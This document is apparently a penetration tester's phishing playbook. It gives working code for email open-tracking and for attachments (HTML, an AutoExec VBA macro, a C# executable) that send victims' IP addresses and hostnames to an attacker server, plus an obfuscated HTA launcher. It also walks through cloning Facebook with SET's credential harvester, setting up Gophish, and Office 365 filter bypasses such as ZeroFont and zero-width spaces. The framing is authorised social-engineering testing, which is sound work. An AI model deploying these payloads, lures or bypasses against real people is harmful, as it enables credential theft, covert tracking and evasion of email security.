Social Engineering Testing - Phishing
Update on 20190527
Design Domain Name using CATPHISH or DNSTWIST
CATPHISH can be retrieved at https://github.com/ring0lab/catphish
DNSTWIST can be retrieved at https://github.com/elceef/dnstwist
A1. Phishing
1. Build Email Template manually using HTML2. Include the following HTML code to keep track the action of victim once the victim enable the image to be load while reading the mail
<img src="http://<server_ip>/tracker.php?email=<victim_email>"/>
3. Create tracker.php and log.txt in DocumentRoot (e.g /var/www/html).4. Include the following PHP codes inside tracker.php.
<?php
date_default_timezone_set ("Asia/Kuala_Lumpur");
$today = date("d-m-Y H:i:s");
if(isset($_GET["email"])){
$logMessage = '['.$today.'] '.$_GET["email"].' read the mail. ';
}
$filePath = "./log.txt";
$logFile = fopen($filePath,"a+");
fwrite($logFile, $logMessage);
fclose($logFile);
?>
5. Read the log.txt to see who are trying to open up the mail.
A2. Attachment (HTML)
1. Create promotion.html with the following content:<html>
<head></head>
<body>
<script>
var xhr = new XMLHttpRequest();
xhr.open('GET', "http://ipinfo.io/json", true);
xhr.send();
xhr.addEventListener("readystatechange", processRequest, false);
var ip = "";
function processRequest(e) {
if (xhr.readyState == 4 && xhr.status == 200) {
var response = JSON.parse(xhr.responseText);
ip = response.ip;
country = response.country;
}
var log = "[" + Date() + "] " + ip + " from " + country + " accessed to " + "" + " (" + window.location.href + ") with HTML attachment.\r\n";
new Image().src = 'http://<server_ip>/tracker.php?attachment=' + log;
}
</script>
</body>
</html>
2. Modify tracker.php from A1. Phishing, add in the following code:
if(isset($_GET["attachment"])){
$logMessage = $_GET["attachment"];
}
3. Send victim an email with promotion.html attachment.4. Read the log.txt to see who are trying to open up the attachment.
A3. Attachment (VBA)
1. Create and open promotion.docm.2. Press Alt + F9 to open Macros windows. Create a macro named AutoExec.
Sub AutoExec()
Dim MyRequest As Object
Set MyRequest = CreateObject("WinHttp.WinHttpRequest.5.1")
Dim DateTime As String
Dim IPAddress As String
Dim Hostname As String
Dim Log As String
DateTime = Now
IPAddress = GetIPAddress()
Hostname = Environ("computername")
Log = "[" + DateTime + "] Accessed to " + IPAddress + "(" + Hostname + ")" + " with attachment."
' MsgBox Log
MyRequest.Open "GET", _
"http://<server_ip>/tracker.php?attachment=" + Log
' Send Request.
MyRequest.Send
' MsgBox IPAddress + "accessed by " + Hostname
End Sub
Function GetIPAddress()
Const strComputer As String = "." ' Computer name. Dot means local computer
Dim objWMIService, IPConfigSet, IPConfig, IPAddress, i
Dim strIPAddress As String
' Connect to the WMI service
Set objWMIService = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
' Get all TCP/IP-enabled network adapters
Set IPConfigSet = objWMIService.ExecQuery _
("Select * from Win32_NetworkAdapterConfiguration Where IPEnabled=TRUE")
' Get all IP addresses associated with these adapters
For Each IPConfig In IPConfigSet
IPAddress = IPConfig.IPAddress
If Not IsNull(IPAddress) Then
strIPAddress = strIPAddress & Join(IPAddress, ", ")
End If
Next
GetIPAddress = strIPAddress
End Function
4. Send the attachment to the victim and read log.txt.
A4. Attachment (Executable File)
1. Create a Console App (.Net Framework) using Microsoft Visual Studio.2. Edit Program.cs with the following code.
using System;
using System.Net;
using System.Globalization;
namespace TrackMe
{
class Program
{
static void Main(string[] args)
{
DateTime localDate = DateTime.Now;
var culture = new CultureInfo("en-US");
string datetime = localDate.ToString(culture);
IPHostEntry host;
string localIP = "";
string hostname = Dns.GetHostName();
host = Dns.GetHostEntry(hostname);
//To retrieve IP Addresses
foreach (IPAddress ip in host.AddressList)
{
if (ip.AddressFamily.ToString() == "InterNetwork")
{
localIP = ip.ToString();
}
}
String log = $"[{datetime}] Accessed to {localIP} ({hostname}) with attachment.";
//To send the logs to receiver
var client = new WebClient();
var content = client.DownloadString($"http://<server_ip>/tracker.php?attachment={log}");
}
}
}
3. Get the executable file (.exe) and send it to victim.
4. Study log.txt.
A5. Attachment (HTA File)
<html>
<head>
<script>
a=new ActiveXObject('Wscript.Shell');
a.Run("calc.exe",0,false);
</script>
</head>
<body>
</body>
</html>
Obfuscated version.
https://www.cleancss.com/javascript-obfuscate/index.php
<html>
<head>
<script>
eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1=5 4(\'3.2\');1.6("8.7",0,9);',10,10,'|a|Shell|Wscript|ActiveXObject|new|Run|exe|calc|false'.split('|'),0,{}))
</script>
</head>
<body>
</body>
</html>
B1. Social Engineering Toolkit (SET)
1. Download SET from https://github.com/trustedsec/social-engineer-toolkit
2. run setoolkit and select the following sequence of options:
1) Social-Engineering Attacks
2) Website Attack Vectors
3) Credential Harvester Attack Method
2) Site Cloner
root@kali:~/Downloads/social-engineer-toolkit-master# python setoolkit
set> 1
set> 2
set:webattack>3
set:webattack>2
3. Enter your server IP address and the website URL which you would like to clone.
set:webattack> IP address for the POST back in Harvester/Tabnabbing [192.168.231.129]:192.168.231.129
set:webattack> Enter the url to clone:https://www.facebook.com
4. Wait for the victim to click on the hyperlink in the email and enter the credentials.
5. Study the response at terminal.
B2. Gophish
1. Download Gophish at https://getgophish.com.
2. Run gophish.exe
3. Browse https://127.0.0.1:3333/login and login (default credentials: admin:gophish)
B2.1 Setup Sending Profile
B2.2 Create Mail Template
B2.3 Import Landing page
B2.4 Import User Group
B2.5 Create Campaign
The sample email received by the victim as below:
The source code of the email reveals the actual link for password reset hyperlink.
B2.7 Monitor Campaign
B2.7 Monitor Campaign
C. Email Template
Email Storage Full
<table border="0" cellpadding="0" cellspacing="0" width="600"><tr><td valign="top" width="300px" bgcolor="#990000"><font color="white"> 1864 MB</font></td><td valign="top" width="10px" bgcolor="#c2c2a3"> </td><td> 2048 MB</td></tr></table>
Email Image
Image to Base64: https://www.ofoct.com/html5-app/image-to-css3.html
<img src="data:image/png;base64,..." />
Microsoft Office 365 Bypass
BaseStriker
baseStriker: Office 365 Security Fails To Secure 100 Million Email Users<html>
<head>
<base href="http://localhost">
</head>
<body>
This is how <a href="dvwa">baseStriker</a> bypass Microsoft Office 365 Safe Links.
</body>
</html>
Zero Font
ZeroFont Phishing: Manipulating Font Size to Get Past Office 365 Security<html>
<head></head>
<body>
<h1>ZeroFont Phishing (Office 365 Bypass)</h1>
<h3><span style="font-size: 0px;">A </span>C<span style="font-size: 0px;">onvincing BEC email </span> o<span style="font-size: 0px;">r </span> p<span style="font-size: 0px;">hish</span>y t<span style="font-size: 0px;">ext </span>hi<span style="font-size: 0px;">de</span>s <span style="font-size: 0px;">with</span>in<span style="font-size: 0px;"> a </span>to<span style="font-size: 0px;">t</span> a <span style="font-size: 0px;">lly different con</span>text <span style="font-size: 0px;">. An advanc</span>ed<span style="font-size: 0px;"> f</span>i<span style="font-size: 0px;">l</span>t<span style="font-size: 0px;">er </span>or <span style="font-size: 0px;">AI sc</span>an<span style="font-size: 0px;">ner shoul</span>d see wh<span style="font-size: 0px;">at </span>y<span style="font-size: 0px;">ou do. If not,</span> your phishing filter would mis<span style="font-size: 0px;">read the way you </span>s<span style="font-size: 0px;">ee</span> it.</h3>
</body>
</html>
Zero-Width Spaces (ZWSPs)
Z-WASP Vulnerability Used to Phish Office 365 and ATP<a href="http://www‌.google.‌com">Google</a>